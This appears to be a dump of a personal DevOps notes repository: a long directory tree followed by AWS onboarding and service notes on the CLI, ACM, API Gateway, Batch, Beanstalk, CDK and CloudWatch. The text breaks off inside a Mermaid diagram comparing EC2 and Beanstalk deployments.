├── AWS ├── README.md ├── onboarding │ ├── README.md │ ├── aws-account.md │ ├── aws-cli.md │ ├── aws-overview.md │ ├── aws-pricing.md │ ├── cloud-models.md │ ├── saas-paas-vs-iaas.md │ └── serverless.md ├── scripts │ ├── aws-month-costs.sh │ └── aws-services-all-regions.sh └── services │ ├── acm.md │ ├── api-gateway.md │ ├── asg.md │ ├── aws-iac-comparison.md │ ├── batch.md │ ├── beanstalk.md │ ├── cdk.md │ ├── cloudformation.md │ ├── cloudwatch.md │ ├── compute.md │ ├── dbs.md │ ├── dynamodb.md │ ├── ebs-vs-efs-vs-instance-store-vs-s3.md │ ├── ebs.md │ ├── ec2-vs-beanstalk.md │ ├── ec2.md │ ├── ecs.md │ ├── efs.md │ ├── eks.md │ ├── elasticache.md │ ├── elb.md │ ├── example1.md │ ├── fsx.md │ ├── iam.md │ ├── lambda-vs-batch.md │ ├── lambda.md │ ├── lightsail.md │ ├── rds.md │ ├── route-53.md │ ├── s3.md │ ├── sns.md │ └── vpc.md ├── Applications └── Wakapi │ └── README.md ├── CI-CD └── Jenkins │ ├── Jenkinsfile │ ├── README.md │ └── installation.sh ├── Cloudflare └── README.md ├── DataStores ├── PostgreSQL │ └── README.md └── README.md ├── DevOps ├── NexusOSS.md ├── SonarQube.md └── tools │ ├── BUILD │ ├── README.md │ └── devops-tools.Dockerfile ├── Docker ├── commands.md ├── docker-compose-template.yml ├── dockerfile-notes.md ├── install-docker.sh └── swarm-notes.md ├── GIT ├── README.md └── concepts.md ├── GitHub └── actions.md ├── GitOps └── README.md ├── Hugo └── notes.md ├── IaC ├── Ansible │ ├── README.md │ ├── common-code-snippets.md │ ├── examples │ │ ├── 1.hello-world │ │ │ ├── RUNME │ │ │ ├── ansible.cfg │ │ │ └── servers │ │ ├── 10.tags │ │ │ ├── ansible.cfg │ │ │ ├── dummy-playbook.yml │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ │ ├── 11.files │ │ │ ├── ansible.cfg │ │ │ ├── copy-and-extract-zip-playbook.yml │ │ │ ├── copy-file-playbook.yml │ │ │ ├── files │ │ │ │ ├── dummy_file.txt │ │ │ │ └── dummy_folder.zip │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ │ ├── 12.services │ │ │ ├── ansible.cfg │ │ │ ├── hosts │ │ │ ├── playbook.yml │ │ │ └── 
run-playbook.sh │ │ ├── 13.users │ │ │ ├── ansible.cfg │ │ │ ├── files │ │ │ │ └── sudoer_superuser │ │ │ ├── hosts │ │ │ ├── playbook.yml │ │ │ └── run-playbook.sh │ │ ├── 14.create-sudo-user-and-remove-become │ │ │ ├── ansible.cfg │ │ │ ├── bootstrap.yml │ │ │ ├── hosts-bootstrap │ │ │ ├── hosts-normal │ │ │ ├── playbook.yml │ │ │ └── run-playbook.sh │ │ ├── 15.roles │ │ │ ├── README.md │ │ │ ├── ansible.cfg │ │ │ ├── hosts │ │ │ ├── playbook.yml │ │ │ ├── roles │ │ │ │ ├── base │ │ │ │ │ └── tasks │ │ │ │ │ │ └── main.yml │ │ │ │ └── servers │ │ │ │ │ ├── files │ │ │ │ │ └── dummy-file-from-roles-example │ │ │ │ │ └── tasks │ │ │ │ │ └── main.yml │ │ │ └── run-playbook.sh │ │ ├── 16.host_vars │ │ │ ├── README.md │ │ │ ├── ansible.cfg │ │ │ ├── host_vars │ │ │ │ ├── 192.168.10.77.yml │ │ │ │ ├── 192.168.10.78.yml │ │ │ │ └── 192.168.10.79.yml │ │ │ ├── hosts │ │ │ │ └── servers │ │ │ ├── playbook.yml │ │ │ └── run-playbook.sh │ │ ├── 17.handlers │ │ │ ├── ansible.cfg │ │ │ ├── handlers.yml │ │ │ ├── hosts │ │ │ ├── playbook.yml │ │ │ └── run-playbook.sh │ │ ├── 18.templates │ │ │ ├── ansible.cfg │ │ │ ├── hosts │ │ │ ├── playbook.yml │ │ │ ├── run-playbook.sh │ │ │ └── templates │ │ │ │ └── dummy-template.j2 │ │ ├── 2.become-sudo │ │ │ ├── RUNME │ │ │ ├── ansible.cfg │ │ │ └── servers │ │ ├── 3.first-playbook │ │ │ ├── RUNME │ │ │ ├── ansible.cfg │ │ │ ├── install_package.yml │ │ │ ├── remove_package.yml │ │ │ └── servers │ │ ├── 4.debug-and-logs │ │ │ ├── ansible.cfg │ │ │ ├── dummy-playbook.yml │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ │ ├── 5.playbook-and-become │ │ │ ├── ansible.cfg │ │ │ ├── dummy-playbook.yml │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ │ ├── 6.multiple-distros │ │ │ ├── ansible.cfg │ │ │ ├── dummy-playbook.yml │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ │ ├── 7.improve-playbooks-combine-tasks │ │ │ ├── ansible.cfg │ │ │ ├── dummy-playbook.yml │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ │ ├── 8.improve-playbooks-use-variables │ │ │ ├── 
ansible.cfg │ │ │ ├── dummy-playbook.yml │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ │ └── 9.groups-target-nodes │ │ │ ├── ansible.cfg │ │ │ ├── dummy-playbook.yml │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ └── structure-template │ │ ├── README.md │ │ ├── RUN_BOOTSTRAP │ │ ├── ansible.cfg │ │ ├── bootstrap.yml │ │ ├── bootstrap_complete.yml │ │ ├── files │ │ └── root-dummy-file │ │ ├── group_vars │ │ ├── all │ │ └── servers.yml │ │ ├── handlers │ │ └── main.yml │ │ ├── host_vars │ │ ├── 192.168.10.77.yml │ │ ├── ansible-test-server-1.yml │ │ └── ansible-test-server-2.yml │ │ ├── hosts │ │ ├── servers.ini │ │ └── servers.yml │ │ ├── logs │ │ └── .gitignore │ │ ├── playbook.yml │ │ ├── roles │ │ └── base │ │ │ ├── files │ │ │ └── base-role-dummy-file │ │ │ ├── handlers │ │ │ └── main.yml │ │ │ └── tasks │ │ │ └── main.yml │ │ ├── templates │ │ └── dummy-root-template.j2 │ │ └── vars │ │ └── other_variables.yml ├── README.md ├── Terraform │ ├── 0-template │ │ ├── .gitignore │ │ └── main.tf │ ├── 1-local │ │ ├── .gitignore │ │ ├── providers.tf │ │ └── resources.tf │ ├── 2-tfstate-backends │ │ ├── .gitignore │ │ ├── providers.tf │ │ └── resources.tf │ ├── 3-variables │ │ ├── .gitignore │ │ ├── custom.tfvars │ │ ├── production.auto.tfvars │ │ ├── providers.tf │ │ ├── resources.tf │ │ ├── terraform.tfvars │ │ └── variables.tf │ ├── 4-modulles │ │ ├── .gitignore │ │ ├── local-file │ │ │ ├── .gitignore │ │ │ ├── output.tf │ │ │ ├── providers.tf │ │ │ ├── resources.tf │ │ │ ├── terraform.tfvars │ │ │ └── variables.tf │ │ └── main.tf │ ├── README.md │ ├── aws │ │ ├── README.md │ │ ├── ec2 │ │ │ ├── .gitignore │ │ │ ├── ec2-instances.tf │ │ │ ├── outputs.tf │ │ │ ├── providers.tf │ │ │ ├── terraform.tfvars │ │ │ └── variables.tf │ │ └── s3 │ │ │ ├── .gitignore │ │ │ ├── private-bucket.tf │ │ │ └── providers.tf │ ├── hashicorp-vault.md │ ├── proxmox │ │ ├── README.md │ │ └── clone-from-template-vm │ │ │ ├── .gitignore │ │ │ ├── main.tf │ │ │ ├── terraform.tfvars │ │ │ └── 
variables.tf │ └── structure-template │ │ ├── .gitignore │ │ ├── README.md │ │ ├── data.tf │ │ ├── locals.tf │ │ ├── main.tf │ │ ├── modules │ │ └── dummy │ │ │ ├── main.tf │ │ │ ├── outputs.tf │ │ │ ├── terraform.tfvars │ │ │ └── variables.tf │ │ ├── outputs.tf │ │ ├── providers.tf │ │ ├── terraform.tfvars │ │ └── variables.tf └── Vagrant │ ├── README.md │ ├── multi-vms │ └── Vagrantfile │ └── ubuntu-focal │ └── Vagrantfile ├── Java ├── Maven-http-server │ ├── .gitignore │ ├── README.md │ ├── checkstyle.xml │ ├── pom.xml │ └── src │ │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── App.java │ │ └── webapp │ │ │ └── index.html │ │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── AppTest.java ├── Simple-http-server │ ├── README.md │ ├── SimpleHttpServer.java │ └── index.html └── maven.md ├── Kubernetes ├── README.md ├── configuration-files │ └── hello-nginx.yml ├── kubeadm-cluster.md └── minikube.md ├── LICENSE ├── Linux ├── Debian │ └── apps-install.sh ├── Kernel │ └── README.md ├── RPM │ ├── CentOS │ │ └── README.md │ ├── README.md │ └── httpd │ │ ├── demo-http-server-simple.sh │ │ └── demo-http-server.sh ├── Systemd │ ├── README.md │ ├── examples │ │ └── ddns-update │ │ │ ├── INSTALL │ │ │ ├── update_ddns.service │ │ │ ├── update_ddns.sh │ │ │ └── update_ddns.timer │ ├── journalctl.md │ ├── my-dummy-service.service │ ├── service-template.service │ ├── service.md │ ├── target.md │ └── timer.md ├── Ubuntu │ └── workspaces.md ├── apt │ └── README.md ├── awesome-cli-tools.md ├── bash │ ├── bash-expansions.md │ ├── brackets.md │ ├── conditions.md │ ├── custom-bash-prompt.md │ ├── loops.md │ ├── program-variables.sh │ ├── uuid.md │ └── variables.md ├── bootloader.md ├── bu │ └── snapshots.md ├── build-and-install-kernel.md ├── cgroup │ └── README.md ├── chroot-liveusb.md ├── dnf │ └── README.md ├── files │ ├── files-on-unix.md │ └── system-info-files.md ├── load-average.md ├── logs │ └── README.md ├── misc │ └── README.md ├── processes.md 
├── storage │ ├── disks-manipulation.md │ └── nfs.md ├── sudo.md ├── useful-commands.md └── users-management.md ├── Markdown ├── highlights.md ├── mermaid.md └── unicodes.md ├── Mikrotik ├── 0.Fresh-install.md ├── 1.Mikrotik-update.md ├── 2.Backup.md ├── Firewall.md ├── OVPN │ ├── OVPN-notes.md │ └── template.ovpn └── default-configuration ├── Misc ├── ipmi.md └── mdm.md ├── Monitoring ├── Prometheus │ ├── README.md │ └── examples │ │ └── hello-world │ │ ├── README.md │ │ └── prometheus.yml └── grafana.md ├── Networks ├── CCNA │ ├── README.md │ ├── cisco-packet-tracer.md │ └── sfp.md ├── VLAN │ └── README.md ├── commands.md ├── dhcpcd.md ├── dmz.md ├── dns-records.md ├── firewalls.md ├── high-availability.md ├── ip.md ├── mDNS.md ├── openwrt │ └── README.md ├── osi.md ├── packet-capture.md ├── pfsense │ └── README.md ├── ports.md ├── protocols │ └── tftp.md └── static-ip.md ├── Nginx-Proxy-Manager ├── README.md └── doc │ ├── npm-proxy.png │ └── npm-ssl.png ├── Proxmox ├── NVIDIA-GPU.sh ├── Portainer.md ├── README.md ├── backup-and-snapshots.md ├── cli.md ├── clustering.md ├── create-CT-template.md ├── create-CT.md ├── create-VM-template.md ├── create-VM.md ├── firewall.md ├── high-availability.md ├── installation.md ├── networking.md ├── post-installation.md ├── storage.md └── user-management.md ├── RDP ├── README.md └── Rustdesk.md ├── README.md ├── Rust └── notes.rs ├── SSH ├── README.md ├── reverse-shell.md ├── ssh-tunneling.md └── sshfs.md ├── Ventoy └── README.md ├── Virtualization ├── Gnome-boxes │ └── README.md ├── Multipass │ └── README.md └── Virtualbox │ └── ova-to-vm.sh ├── Web ├── CSS.md └── server │ └── static-demo-website │ ├── css │ └── style.css │ ├── index.html │ └── js │ └── function.js ├── Wordpress └── README.md └── ZSH └── fonts.md /AWS/README.md: -------------------------------------------------------------------------------- 1 | # AWS notes 2 | 3 | --- 4 | 5 | ## AWS utilization 6 | 1. Install VS-Code 7 | 2. 
[Install AWS CLI](./onboarding/aws-cli.md) 8 | 3. AWS Cloudshell 9 | 10 | ## Account 11 | Read [IAM](./services/iam.md) to create your first account. 12 | 13 | ## Overview 14 | To gain a basic understanding of AWS, read [this](./onboarding/aws-overview.md) 15 | 16 | 17 | ## [Free Tier](https://aws.amazon.com/free/?p=ft&z=subnav&loc=2&all-free-tier.sort-by=item.additionalFields.SortRank&all-free-tier.sort-order=asc&awsf.Free%20Tier%20Types=*all&awsf.Free%20Tier%20Categories=*all) 18 | --- 19 | 20 | -------------------------------------------------------------------------------- /AWS/onboarding/README.md: -------------------------------------------------------------------------------- 1 | # AWS start-up guide 2 | 3 | 0. [What is a public cloud](./cloud-models.md). 1. Read [AWS overview](./aws-overview.md) to understand the basics. 2. Create an AWS account by following [this guide](./aws-account.md#-start-here-). 3. Then create a [new IAM user](../services/iam.md#create-iam-user). 4. If you want to access AWS from a terminal, you are now ready to install & configure [AWS CLI](./aws-cli.md), or you can use [Cloudshell](#). -------------------------------------------------------------------------------- /AWS/onboarding/aws-cli.md: -------------------------------------------------------------------------------- 1 | # AWS CLI 2 | 3 | ## Install AWS CLI 4 | [Instructions](https://docs.aws.amazon.com/cli/latest/userguide/getting-started-install.html) to install the AWS CLI. 5 | 6 | E.g. on a Debian-based system: 7 | ``` 8 | curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip" 9 | unzip awscliv2.zip 10 | sudo ./aws/install 11 | ``` 12 | 13 | ## Reference 14 | Visit [AWS CLI reference](https://docs.aws.amazon.com/cli/latest/reference/) for details. 15 | 16 | As a best practice, instead of using the root account, we will create a new IAM user and use it to access our account from the aws-cli. 17 | 18 | --- 19 | 20 | ## 1. 
Create an IAM User to have CLI access 21 | 1. Log in to AWS 22 | 2. Search for `IAM` 23 | 3. Open `User Management` 24 | 4. `Users` 25 | 5. `Create User` 26 | 6. Enter a username 27 | 7. `Next` 28 | 8. Set the permissions options to `Attach policies directly` 29 | 9. Attach the permissions you want (e.g. `AdministratorAccess`) 30 | 10. `Next` 31 | 11. `Create User` 32 | 33 | To use this user from the aws-cli we need access keys. Click on the user to create them. 34 | 35 | ## 2. Create Access Keys 36 | 1. Log in to AWS 37 | 2. Search for `IAM` 38 | 3. Open `User Management` 39 | 4. `Users` 40 | 5. Click on your user 41 | 6. Go to `Security Credentials` 42 | 7. `Access keys` 43 | 8. `Create access keys` 44 | 9. `Command Line Interface (CLI)` 45 | 10. `Create access keys` 46 | 47 | **DO NOT REVEAL THE ACCESS KEY AND SECRET ACCESS KEY!** 48 | 49 | ## 3. AWS-CLI Configuration 50 | To configure the CLI, run: 51 | ``` 52 | $ aws configure 53 | AWS Access Key ID [None]: 54 | AWS Secret Access Key [None]: 55 | Default region name [None]: us-east-1 56 | Default output format [None]: json 57 | ``` 58 | 59 | Then, the input will be stored in `~/.aws/credentials` and `~/.aws/config` as plaintext. 60 | 61 | ## 4. Verification 62 | To verify that the aws-cli is linked with your account, run: 63 | `aws sts get-caller-identity` 64 | 65 | --- 66 | 67 | > [!TIP] 68 | > As an alternative, you can also use `Cloudshell`, a service available in the `Management Console`, which does not require `access keys`. 69 | > 70 | > However, Cloudshell is not available in all regions. 
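Since `~/.aws/credentials` is plain INI text, it can be inspected programmatically with nothing but the standard library. A minimal sketch (the key values below are obviously fake placeholders, and the real file lives under your home directory):

```python
import configparser
import os
import tempfile

# Recreate a minimal credentials file (as written by `aws configure`)
# in a temporary directory, then parse it back. The key values are fake.
sample = """\
[default]
aws_access_key_id = AKIAEXAMPLE
aws_secret_access_key = not-a-real-secret
"""

with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "credentials")
    with open(path, "w") as f:
        f.write(sample)

    cfg = configparser.ConfigParser()
    cfg.read(path)  # the same parsing works on the real ~/.aws/credentials
    print(cfg["default"]["aws_access_key_id"])
```

Because the keys are stored unencrypted, treat `~/.aws/credentials` like a password file: restrict its permissions and never commit it to version control.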
71 | -------------------------------------------------------------------------------- /AWS/onboarding/serverless.md: -------------------------------------------------------------------------------- 1 | # Serverless 2 | Serverless is a **cloud computing model** where the **cloud provider** automatically **manages** the infrastructure, allowing developers to focus solely on writing code without worrying about provisioning, managing, or scaling servers. 3 | 4 | **AWS serverless services examples:** 5 | 1. [S3](../services/s3.md) 6 | 2. [DynamoDB](../services/dynamodb.md) 7 | 3. [Fargate](../services/ecs.md#elastic-container-service-ecs) 8 | 4. [Lambda](../services/lambda.md) 9 | 10 | 11 | **Benefits:** 12 | - **Simplified Development:** No need to manage infrastructure, which accelerates development. 13 | - **Cost-Effective:** You only pay for what you use, making it more cost-efficient for applications with variable traffic. 14 | - **Faster Time to Market:** With less infrastructure to manage, applications can be developed and deployed faster. -------------------------------------------------------------------------------- /AWS/services/acm.md: -------------------------------------------------------------------------------- 1 | # AWS Certificate Manager (ACM) 2 | 3 | ## Request a Certificate 4 | To enable HTTPS on a service we must first create a certificate. Since we are using AWS 5 | and public certificates are free, we can create a certificate using ACM. 6 | 7 | 1. Search `ACM Certificate Manager` 8 | 2. `Request` 9 | 3. `Request a public certificate` 10 | 4. Enter your domain, e.g. `*.yourdomain.com` (the star at the beginning makes it a wildcard certificate) 11 | 5. `DNS validation` 12 | 6. Create your certificate 13 | 14 | ## Domain name registrar 15 | Then copy `CNAME name` & `CNAME value` from ACM and add those values to your domain name registrar as follows: 16 | - For `CNAME name` remove the domain part and keep only the underscore with the random numbers. 17 | - For `CNAME value` remove the dot at the end. 
18 | 19 | | record type | Name | Data | 20 | | ------------| ----| -------| 21 | | CNAME | `_<random>` | `_<random>.<random>.acm-validations.aws` | 22 | 23 | Verification: 24 | `dig @8.8.8.8 CNAME _<random>.<your-domain> +short` 25 | 26 | The above command should return the `CNAME value`. -------------------------------------------------------------------------------- /AWS/services/api-gateway.md: -------------------------------------------------------------------------------- 1 | # API Gateway 2 | AWS API Gateway is a **fully managed** service that allows you to create, publish, maintain, monitor, and secure APIs for your applications. It acts as an **interface** between clients (such as web or mobile applications) and backend services (such as AWS [Lambda](./lambda.md) functions, [EC2](./ec2.md) instances, or any HTTP endpoint). 3 | 4 | | Feature | Description | 5 | | ------- | ------------| 6 | | API Creation and Management | Easily create RESTful, WebSocket, or HTTP APIs with minimal setup and configuration. 7 | | Serverless | Integrates seamlessly with AWS [Lambda](./lambda.md), allowing you to build [serverless](../onboarding/serverless.md) applications that don’t require you to manage servers. 8 | | Scalable | Automatically scales to handle large numbers of API calls without any manual intervention. 9 | | Routing and Transformation | You can route requests to different backend services and perform transformations (e.g., converting XML to JSON) before sending the request to the backend. 10 | | Authentication and Authorization | Supports a variety of authentication mechanisms (IAM, Lambda authorizers, Amazon Cognito, etc.) to secure your APIs. 11 | | Traffic Management | Provides features like throttling, request validation, and rate limiting to ensure your API performs well under high traffic loads. 12 | | Monitoring and Logging | Integrated with Amazon CloudWatch, allowing you to monitor API performance, track errors, and log requests/responses for debugging. 
13 | | API Versioning | Supports versioning, so you can manage different versions of your API without disrupting users. 14 | | Cost-Effective | Pay-as-you-go pricing model, where you only pay for the API calls you handle and the data transferred. 15 | 16 | Example 17 | ```mermaid 18 | graph LR 19 | subgraph clientside[" "] 20 | direction LR 21 | Client <--> |Rest API| apigateway["API Gateway"] 22 | end 23 | style clientside opacity:0 24 | 25 | apigateway <--> |Proxy Requests| lambda 26 | 27 | subgraph serverside[" "] 28 | direction LR 29 | lambda((Lambda)) <--> |CRUD| db[("DynamoDB")] 30 | end 31 | style serverside opacity:0 32 | ``` -------------------------------------------------------------------------------- /AWS/services/aws-iac-comparison.md: -------------------------------------------------------------------------------- 1 | # Infrastructure as Code (IaC) comparison solutions 2 | 3 | 4 | ## AWS CDK vs CloudFormation vs Terraform 5 | | Feature | [AWS CDK](./cdk.md) | [CloudFormation](./cloudformation.md) | Terraform | 6 | | --------| --------| ---------------| ----------| 7 | | Language | TypeScript, Python, Go, Java, C# | YAML/JSON | HCL (HashiCorp) 8 | | Resource Management | AWS CloudFormation | AWS CloudFormation | Terraform Engine 9 | | Modularity | High (Classes, Functions) | Low (YAML Templates) | Medium (Modules) 10 | | Multi-Cloud | No (AWS Only) | No (AWS Only) | Yes (AWS, GCP, Azure) 11 | | Ease of Use | High (Code-based) | Medium (Declarative) | Medium (Declarative) 12 | | State Management | CloudFormation Manages | CloudFormation Manages | Requires Remote Backend 13 | 14 | ## AWS CDK vs CloudFormation use cases 15 | | Use Case | AWS CDK | CloudFormation | 16 | | ------| -------- | ------------- | 17 | | Programmatic logic needed (e.g., loops, conditions, dynamic naming) | ✅ Yes | ❌ No 18 | | Quick setup & best practices | ✅ Yes | ❌ No 19 | | Easier collaboration with DevOps & Developers | ✅ Yes | ❌ No 20 | | Strict declarative infrastructure (No 
programming required) | ❌ No | ✅ Yes 21 | -------------------------------------------------------------------------------- /AWS/services/batch.md: -------------------------------------------------------------------------------- 1 | # Batch 2 | AWS Batch is a **fully managed** batch processing service that allows you to run batch jobs at any scale. It enables you to efficiently run and scale hundreds or thousands of batch computing jobs in the cloud, without needing to manually manage infrastructure. 3 | 4 | > [!NOTE] 5 | > A batch job is a type of job or task that has a defined **start** and **end** point, processing data in **discrete** chunks rather than continuously. 6 | 7 | Batch will spawn [EC2](./ec2.md) or [Spot](#) Instances. 8 | 9 | 10 | | Feature | Description | 11 | | --------------- | ------------ | 12 | | Automatic Scaling | AWS Batch automatically provisions and scales compute resources based on the volume and resource requirements of your batch jobs. 13 | | Managed Infrastructure | You don’t need to worry about managing servers, clusters, or queues. AWS Batch handles the infrastructure for you. 14 | | Job Scheduling | You can submit, monitor, and manage batch jobs using the AWS Management Console, CLI, or SDKs. It also supports job dependencies and prioritization. 15 | | Support for Docker Containers | You can use Docker containers to package and run your batch jobs, enabling a consistent environment for job execution. 16 | | Compute Environment Selection | AWS Batch integrates with Amazon [EC2](./ec2.md) (on-demand or spot instances) and Amazon [EC2](./ec2.md) Auto Scaling groups to provide appropriate compute resources. 17 | | Flexible Job Queues | You can define job queues for different priority levels and types of jobs. 18 | | Cost Efficiency | Using [Spot](#) instances can help reduce the cost of running batch jobs. 19 | 20 | > [!IMPORTANT] 21 | > A comparison between Lambda and Batch is available [here](./lambda-vs-batch.md). 
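The "discrete chunks" idea from the note above can be sketched in a few lines of plain Python. This is a conceptual toy only, not AWS-specific (Batch itself runs each job as a container on the EC2/Spot capacity it provisions), and the chunk size and data are arbitrary:

```python
# Toy sketch of batch-style processing: split the work into fixed-size
# chunks, process each chunk independently, and finish when all chunks
# are done -- a defined start and end, unlike a continuous stream.
def chunks(items, size):
    """Yield successive fixed-size chunks from a list."""
    for i in range(0, len(items), size):
        yield items[i:i + size]

def process_chunk(chunk):
    # Stand-in for real per-chunk work (transforming records, etc.)
    return sum(chunk)

data = list(range(10))                       # the whole batch of work
results = [process_chunk(c) for c in chunks(data, 4)]
print(results)                               # one result per chunk
```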
22 | -------------------------------------------------------------------------------- /AWS/services/beanstalk.md: -------------------------------------------------------------------------------- 1 | # Beanstalk 2 | AWS Elastic Beanstalk is a **Platform as a Service (PaaS)** that helps developers deploy, manage, and scale applications easily without worrying about the underlying infrastructure. It supports multiple programming languages and automatically handles provisioning, load balancing, scaling, and monitoring. 3 | 4 | > [!NOTE] 5 | > For a full comparison between EC2 and Beanstalk, read [this](./ec2-vs-beanstalk.md). 6 | 7 | --- 8 | 9 | | Feature | Description | 10 | | ------- | ----------- | 11 | | **Fully Managed Deployment** | Automatically provisions and configures AWS resources like [EC2](./ec2.md), [ELB](./elb.md), Auto Scaling Groups, and [RDS](./rds.md). 12 | | **Supports Multiple Programming Languages** | Works with Python, Java, Node.js, .NET, Ruby, PHP, and Go. 13 | | **Built-in Load Balancing & Auto Scaling** | Manages traffic and adjusts resources based on demand. 14 | | **Infrastructure Control** | You can still access and customize the underlying EC2 instances, security groups, and databases. 15 | | **Integration with Developer Tools** | Supports Git, Jenkins, AWS CLI, and IDEs like Visual Studio and IntelliJ. 16 | | **Monitoring & Logging** | Uses Amazon CloudWatch and AWS X-Ray for performance tracking and debugging. 17 | | **Zero Additional Cost** | You pay only for the AWS resources it provisions (EC2, RDS, etc.), not the Elastic Beanstalk service itself. 
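As a concrete starting point, the Beanstalk Python platform by default looks for a file named `application.py` that exposes a WSGI callable named `application`. A minimal sketch using only the standard library (the response text is arbitrary):

```python
# application.py -- minimal WSGI entry point in the form the Elastic
# Beanstalk Python platform expects; the callable must be named
# `application`. Plain WSGI, so it also runs locally without AWS.
def application(environ, start_response):
    body = b"Hello from Elastic Beanstalk\n"
    start_response("200 OK", [
        ("Content-Type", "text/plain"),
        ("Content-Length", str(len(body))),
    ])
    return [body]

# For a local smoke test, the stdlib WSGI reference server works:
#   from wsgiref.simple_server import make_server
#   make_server("", 8000, application).serve_forever()
```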
18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /AWS/services/cdk.md: -------------------------------------------------------------------------------- 1 | # Cloud Development Kit (CDK) 2 | The AWS Cloud Development Kit (CDK) is an **Infrastructure as Code (IaC)** framework that allows you to define cloud infrastructure using programming languages like **TypeScript, Python, Java, C#, and Go** instead of writing raw **YAML/JSON** templates like in [AWS CloudFormation](./cloudformation.md). 3 | 4 | > [!NOTE] 5 | > Using **CDK** both application and infrastructure can be written together in the same language. 6 | 7 | > [!WARNING] 8 | > For a full comparison between different IaC solutions in AWS, read [this](./aws-iac-comparison.md). 9 | 10 | 11 | **Example**: 12 | ```python 13 | from aws_cdk import core 14 | import aws_cdk.aws_s3 as s3 15 | 16 | class MyS3Stack(core.Stack): 17 | def __init__(self, scope: core.Construct, id: str, **kwargs): 18 | super().__init__(scope, id, **kwargs) 19 | 20 | s3.Bucket(self, "MyBucket", bucket_name="my-cdk-bucket") 21 | 22 | app = core.App() 23 | MyS3Stack(app, "MyS3Stack") 24 | app.synth() 25 | ``` 26 | 27 | **Use cases**: 28 | - When deploying with docker via [ECS](./ecs.md)/[EKS](./eks.md). 29 | - When deploying with [Lambda](./lambda.md) functions. 
30 | 31 | ```mermaid 32 | graph LR 33 | 34 | subgraph langs["Programming languages"] 35 | direction LR 36 | subgraph cdk-app["CDK Application"] 37 | direction LR 38 | lambda 39 | s3 40 | etc["..."] 41 | style etc opacity:0 42 | end 43 | end 44 | 45 | cdk-app --> cdk-cli 46 | 47 | cdk-cli["CDK CLI"] --> cloudformation-template["Cloudformation Template"] 48 | cloudformation-template --> Cloudformation 49 | ``` -------------------------------------------------------------------------------- /AWS/services/cloudwatch.md: -------------------------------------------------------------------------------- 1 | # CloudWatch 2 | Amazon CloudWatch is a monitoring and observability service offered by AWS that provides actionable insights into your AWS resources and applications. 3 | 4 | --- 5 | 6 | > [!NOTE] 7 | > By default, CloudWatch updates its metrics every 5 minutes. 8 | > This can be reduced to one minute by enabling detailed monitoring, which incurs an additional cost. 9 | 10 | ## Metrics 11 | Tracks performance metrics from AWS services (e.g. EC2, RDS, etc.). 12 | 13 | ## Events 14 | Delivers a near real-time stream of events describing changes in your AWS resources (now part of EventBridge). 15 | ## Logs 16 | Collects, stores, and lets you search log data from AWS services and your applications. 17 | --- 18 | 19 | ## Example 20 | Set an alarm for EC2 when CPU utilization is greater than 60% for 5 minutes. 1. Go to `CloudWatch` 2. `All alarms` 3. `Create alarm` 4. `Select Metric` 5. `EC2` 6. **Important:** make sure the Instance ID is correct! 7. Select instance `CPUUtilization` 8. Set `Static` threshold type 9. Set the value 10. For period set `5 minutes` 11. `Next` 12. Set `In alarm` 13. Define the notification: `Select existing topic` 14. Send a notification to `MonitoringTeam` 15. 
Optionally, add an EC2 action as well (e.g. stop or reboot the instance) 36 | 37 | --- 38 | --- 39 | 40 | ## CLI 41 | 42 | List Log Groups 43 | `aws logs describe-log-groups` 44 | 45 | Get Log Events 46 | `aws logs get-log-events --log-group-name my-log-group --log-stream-name my-log-stream` 47 | -------------------------------------------------------------------------------- /AWS/services/compute.md: -------------------------------------------------------------------------------- 1 | # AWS Compute Services 2 | 3 | 1. [EC2](./ec2.md) 4 | 2. [ECS - Docker on EC2/Fargate](./ecs.md) 5 | 3. [Batch](./batch.md) 6 | 4. [Lambda](./lambda.md) 7 | 5. [Lightsail](./lightsail.md) -------------------------------------------------------------------------------- /AWS/services/ec2-vs-beanstalk.md: -------------------------------------------------------------------------------- 1 | # [EC2](./ec2.md) vs [Beanstalk](./beanstalk.md) 2 | 3 | 4 | ## "Traditional deployment" 5 | ```mermaid 6 | --- 7 | title: 3-Tier Application 8 | --- 9 | %%{init: {'theme':'neutral'}}%% 10 | graph LR 11 | 12 | subgraph users[" "] 13 | direction LR 14 | user1(("User")) 15 | user2(("User")) 16 | user3(("User")) 17 | end 18 | style users opacity:0 19 | 20 | user1 --> elb 21 | user2 --> elb 22 | user3 --> elb 23 | 24 | subgraph elb-sub["Multi AZ"] 25 | direction LR 26 | elb(("ELB")) 27 | end 28 | style elb-sub stroke:#000,stroke-width:2px,stroke-dasharray: 10 10 29 | 30 | subgraph ec2-sub["Auto Scaling Group"] 31 | direction LR 32 | subgraph ec2-sub-az1["AZ 1"] 33 | direction LR 34 | ec2-1["EC2"] 35 | end 36 | subgraph ec2-sub-az2["AZ 2"] 37 | direction LR 38 | ec2-2["EC2"] 39 | end 40 | subgraph ec2-sub-az3["AZ 3"] 41 | direction LR 42 | ec2-3["EC2"] 43 | end 44 | end 45 | 46 | elb <--> ec2-1 47 | elb <--> ec2-2 48 | elb <--> ec2-3 49 | 50 | subgraph db-sub[" "] 51 | direction LR 52 | cache("ElastiCache") 53 | rds[("RDS")] 54 | end 55 | style db-sub opacity:0 56 | 57 | ec2-1 <--> cache 58 | ec2-2 <--> cache 59 | ec2-3 <--> cache 60 | 61 | 
